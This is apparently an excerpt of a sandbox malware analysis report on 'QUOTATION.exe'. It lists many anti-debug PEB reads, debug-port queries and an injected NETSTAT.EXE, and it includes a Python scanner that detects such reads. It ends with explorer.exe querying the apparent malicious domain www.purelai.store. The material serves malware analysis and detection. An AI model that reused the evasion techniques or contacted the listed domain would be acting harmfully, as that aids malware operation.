          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]17_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]17_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100BC2C mov eax, dword ptr fs:[00000030h]17_2_0100BC2C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A44B mov eax, dword ptr fs:[00000030h]17_2_0100A44B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]17_2_0106C450
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]17_2_0106C450
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]17_2_00FFC577
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]17_2_00FFC577
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF7D50 mov eax, dword ptr fs:[00000030h]17_2_00FF7D50
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAD30 mov eax, dword ptr fs:[00000030h]17_2_00FDAD30
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8CD6 mov eax, dword ptr fs:[00000030h]17_2_010A8CD6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010914FB mov eax, dword ptr fs:[00000030h]17_2_010914FB
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]17_2_010A070D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]17_2_010A070D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]17_2_0100A70E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]17_2_0100A70E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]17_2_0106FF10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]17_2_0106FF10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE76E2 mov eax, dword ptr fs:[00000030h]17_2_00FE76E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100E730 mov eax, dword ptr fs:[00000030h]17_2_0100E730
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8F6A mov eax, dword ptr fs:[00000030h]17_2_010A8F6A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE766D mov eax, dword ptr fs:[00000030h]17_2_00FE766D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDE620 mov eax, dword ptr fs:[00000030h]17_2_00FDE620
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010137F5 mov eax, dword ptr fs:[00000030h]17_2_010137F5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01008E00 mov eax, dword ptr fs:[00000030h]17_2_01008E00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091608 mov eax, dword ptr fs:[00000030h]17_2_01091608
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]17_2_0100A61C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]17_2_0100A61C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FE3F mov eax, dword ptr fs:[00000030h]17_2_0108FE3F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]17_2_0109AE44
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]17_2_0109AE44
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE8794 mov eax, dword ptr fs:[00000030h]17_2_00FE8794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FE87 mov eax, dword ptr fs:[00000030h]17_2_0106FE87
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEFF60 mov eax, dword ptr fs:[00000030h]17_2_00FEFF60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010546A7 mov eax, dword ptr fs:[00000030h]17_2_010546A7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEEF40 mov eax, dword ptr fs:[00000030h]17_2_00FEEF40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]17_2_00FFB73D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]17_2_00FFB73D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01018EC7 mov eax, dword ptr fs:[00000030h]17_2_01018EC7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FEC0 mov eax, dword ptr fs:[00000030h]17_2_0108FEC0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010036CC mov eax, dword ptr fs:[00000030h]17_2_010036CC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]17_2_00FD4F2E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]17_2_00FD4F2E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8ED6 mov eax, dword ptr fs:[00000030h]17_2_010A8ED6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010016E0 mov ecx, dword ptr fs:[00000030h]17_2_010016E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFF716 mov eax, dword ptr fs:[00000030h]17_2_00FFF716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330131B mov eax, dword ptr fs:[00000030h]24_2_0330131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] (11 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0324DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0324DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03318B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0324F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03315BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03272397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0327B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0330138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] (6 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032F23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0326DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] (9 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03258A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03245210 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03245210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03263A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0328927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03318A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03249240 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0330EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] (5 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0327FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03272AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] (14 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03272ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03264120 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_03264120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 24_2_0327513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QUOTATION.exe, Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process queried: DebugPort
Source: C:\Users\user\Desktop\QUOTATION.exe, Code function: 17_2_0040ACF0 LdrLoadDll
Source: C:\Users\user\Desktop\QUOTATION.exe, Memory allocated: page read and write | page guard
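Every `mov eax/ecx, dword ptr fs:[00000030h]` line above is the same anti-debug primitive: the TEB slot at fs:[30h] holds the PEB pointer, and PEB.BeingDebugged sits two bytes into it. The following scanner is an added example, not code from the report or from the sandbox vendor; it finds that instruction pattern statically in a raw 32-bit code blob and reports whether the loaded PEB pointer is immediately used as a debugger check. The opcode encodings are the standard x86 ones; SAMPLE_CODE is a constructed fragment, not bytes from the analysed binary.

```python
"""Static scan for 32-bit PEB reads through fs:[30h] (added example).

Not code from the sandbox or the analysed sample: it shows how the
`mov eax/ecx, dword ptr fs:[00000030h]` pattern listed above can be found
statically in a raw code blob, and whether the PEB pointer is then used to
read PEB.BeingDebugged (offset 2). SAMPLE_CODE is constructed for this
example; the opcode encodings are the standard x86 ones.
"""
import struct

FS_PREFIX = 0x64          # segment override prefix for fs:
PEB_OFFSET = 0x30         # TEB.ProcessEnvironmentBlock
# ModRM for `mov r32, [disp32]` (mod=00, rm=101) keyed by the reg field.
REG_BY_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                0x35: "esi", 0x3D: "edi"}
# Instructions that test PEB.BeingDebugged right after the load.
FOLLOWUPS = {
    "eax": [(b"\x0f\xb6\x40\x02", "movzx eax, byte ptr [eax+2]"),
            (b"\x80\x78\x02\x00", "cmp byte ptr [eax+2], 0")],
    "ecx": [(b"\x0f\xb6\x49\x02", "movzx ecx, byte ptr [ecx+2]"),
            (b"\x80\x79\x02\x00", "cmp byte ptr [ecx+2], 0")],
}


def scan_peb_reads(code: bytes, base: int = 0) -> list:
    """Return one dict per `mov r32, fs:[30h]` found in `code`.

    Two encodings are recognised: the short moffs form `64 A1 30 00 00 00`
    (eax only) and the ModRM form `64 8B /r 30 00 00 00`. The scan is a
    byte-pattern search, not a disassembly, so data bytes that happen to
    look like code can produce false positives.
    """
    hits, i, n = [], 0, len(code)
    while i < n:
        reg, length = None, 0
        if code[i] == FS_PREFIX:
            if i + 6 <= n and code[i + 1] == 0xA1:
                if struct.unpack_from("<I", code, i + 2)[0] == PEB_OFFSET:
                    reg, length = "eax", 6
            elif i + 7 <= n and code[i + 1] == 0x8B and code[i + 2] in REG_BY_MODRM:
                if struct.unpack_from("<I", code, i + 3)[0] == PEB_OFFSET:
                    reg, length = REG_BY_MODRM[code[i + 2]], 7
        if reg is None:
            i += 1
            continue
        following = bytes(code[i + length:i + length + 4])
        check = next((text for pat, text in FOLLOWUPS.get(reg, []) if following == pat), None)
        hits.append({
            "offset": base + i,
            "register": reg,
            "instruction": f"mov {reg}, dword ptr fs:[00000030h]",
            "being_debugged_check": check,
        })
        i += length
    return hits


def summarize(hits: list) -> dict:
    """Count PEB reads overall and those immediately used as a debugger check."""
    return {
        "peb_reads": len(hits),
        "being_debugged_checks": sum(1 for h in hits if h["being_debugged_check"]),
    }


# Constructed 32-bit code fragment (not from the analysed binary).
SAMPLE_CODE = (
    b"\x55\x8b\xec"                     # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"         # mov eax, dword ptr fs:[30h]   -> PEB
    b"\x0f\xb6\x40\x02"                 # movzx eax, byte ptr [eax+2]  -> BeingDebugged
    b"\x85\xc0\x75\x10"                 # test eax, eax; jnz +0x10
    b"\x64\x8b\x0d\x30\x00\x00\x00"     # mov ecx, dword ptr fs:[30h]   -> PEB
    b"\x8b\x41\x0c"                     # mov eax, [ecx+0Ch]           -> PEB.Ldr (not a debug check)
    b"\x64\xa1\x18\x00\x00\x00"         # mov eax, dword ptr fs:[18h]   -> TEB, must not match
    b"\x64\x8b\x05\x30\x00\x00\x00"     # mov eax, dword ptr fs:[30h]   (ModRM encoding)
    b"\x80\x78\x02\x00"                 # cmp byte ptr [eax+2], 0      -> BeingDebugged
    b"\xc3"                             # ret
)

if __name__ == "__main__":
    found = scan_peb_reads(SAMPLE_CODE, base=0x03240000)
    for h in found:
        print(f"{h['offset']:08X}  {h['instruction']:<36} {h['being_debugged_check'] or '-'}")
    print(summarize(found))
```

The second hit in the sample (PEB loaded into ecx, then PEB.Ldr read) shows why a bare fs:[30h] read is weak evidence on its own: walking the loader list for API resolution uses the same instruction. Treat the read as a trigger and look at what the pointer is used for, as the check column does here.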

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.purelai.store
